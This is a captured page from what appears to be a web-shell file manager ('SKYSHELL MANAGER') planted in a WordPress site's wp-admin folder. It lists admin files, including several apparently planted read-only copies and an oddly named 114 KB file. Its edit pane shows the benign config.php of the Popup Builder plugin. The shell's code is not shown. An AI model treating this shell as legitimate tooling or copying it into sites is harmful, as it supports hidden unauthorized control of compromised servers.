📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: config.php
<?php if(!class_exists('SgPopupBuilderConfig')) { class SgPopupBuilderConfig { public function __construct() { $this->init(); } private function init() { if (!defined('ABSPATH')) { exit(); } define('SG_APP_POPUP_PATH', dirname(__FILE__)); define('SG_APP_POPUP_URL', plugins_url('', __FILE__)); define('SG_APP_POPUP_ADMIN_URL', admin_url()); define('SG_APP_POPUP_FILE', plugin_basename(__FILE__)); define('SG_APP_POPUP_FILES', SG_APP_POPUP_PATH . '/files'); define('SG_APP_POPUP_CLASSES', SG_APP_POPUP_PATH . '/classes'); define('SG_APP_POPUP_JS', SG_APP_POPUP_PATH . '/javascript'); define('SG_APP_POPUP_HELPERS', SG_APP_POPUP_PATH . '/helpers/'); define('SG_APP_POPUP_TABLE_LIMIT', 15); define('SG_POPUP_VERSION', 2.6546); define('SG_POPUP_PRO_VERSION', 3.376); define('SG_POPUP_PRO_URL', 'https://popup-builder.com/'); define('SG_POPUP_EXTENSION_URL', 'https://popup-builder.com/extensions'); define('SG_MAILCHIMP_EXTENSION_URL', 'https://popup-builder.com/downloads/mailchimp/'); define('SG_ANALYTICS_EXTENSION_URL', 'https://popup-builder.com/downloads/analytics/'); define('SG_AWEBER_EXTENSION_URL', 'https://popup-builder.com/downloads/aweber/'); define('SG_EXITINTENT_EXTENSION_URL', 'https://popup-builder.com/downloads/exit-intent/'); define('SG_ADBLOCK_EXTENSION_URL', 'https://popup-builder.com/downloads/adblock/'); define('SG_IP_TO_COUNTRY_SERVICE_TIMEOUT', 2); define('SG_SHOW_POPUP_REVIEW', get_option("SG_COLOSE_REVIEW_BLOCK")); define('SG_POSTS_PER_PAGE', 1000); define('SG_POPUP_MINIMUM_PHP_VERSION', '5.3.3'); define('SG_POPUP_SHOW_COUNT', 80); define('SG_REVIEW_POPUP_PERIOD', 30); define('SGPB_REVIEW_URL' , 'https://wordpress.org/support/plugin/popup-builder/reviews/?rate=5#rate-response'); /*Example 1 minute*/ define('SG_FILTER_REPEAT_INTERVAL', 1); define('SG_POST_TYPE_PAGE', 'allPages'); define('SG_POST_TYPE_POST', 'allPosts'); define('POPUP_BUILDER_PKG_FREE', 1); define('POPUP_BUILDER_PKG_SILVER', 2); define('POPUP_BUILDER_PKG_GOLD', 3); define('POPUP_BUILDER_PKG_PLATINUM', 4); global $POPUP_TITLES; global $POPUP_ADDONS; $POPUP_TITLES = array( 'image' => 'Image', 'html' => 'HTML', 'fblike' => 'Facebook', 'iframe' => 'Iframe', 'video' => 'Video', 'shortcode' => 'Shortcode', 'ageRestriction' => 'Age Restriction', 'countdown' => 'Countdown', 'social' => 'Social', 'exitIntent' => 'Exit Intent', 'subscription' => 'Subscription', 'contactForm' => 'Contact Form' ); $POPUP_ADDONS = array( 'aweber', 'mailchimp', 'analytics', 'exitIntent', 'adBlock' ); require_once(dirname(__FILE__) . '/config-pkg.php'); } public static function popupJsDataInit() { $popupBuilderVersion = SG_POPUP_VERSION; if (POPUP_BUILDER_PKG > POPUP_BUILDER_PKG_FREE) { $popupBuilderVersion = SG_POPUP_PRO_VERSION; } $dataString = "<script type='text/javascript'> SG_POPUPS_QUEUE = []; SG_POPUP_DATA = []; SG_APP_POPUP_URL = '" . SG_APP_POPUP_URL . "'; SG_POPUP_VERSION='" . $popupBuilderVersion . "_" . POPUP_BUILDER_PKG . ";'; function sgAddEvent(element, eventName, fn) { if (element.addEventListener) element.addEventListener(eventName, fn, false); else if (element.attachEvent) element.attachEvent('on' + eventName, fn); } </script>"; return $dataString; } public static function getFrontendScriptLocalizedData() { $localizedData = array( 'ajaxUrl' => admin_url( 'admin-ajax.php' ), 'ajaxNonce' => wp_create_nonce('sgPbNonce') ); return $localizedData; } } $popupConf = new SgPopupBuilderConfig(); }
Save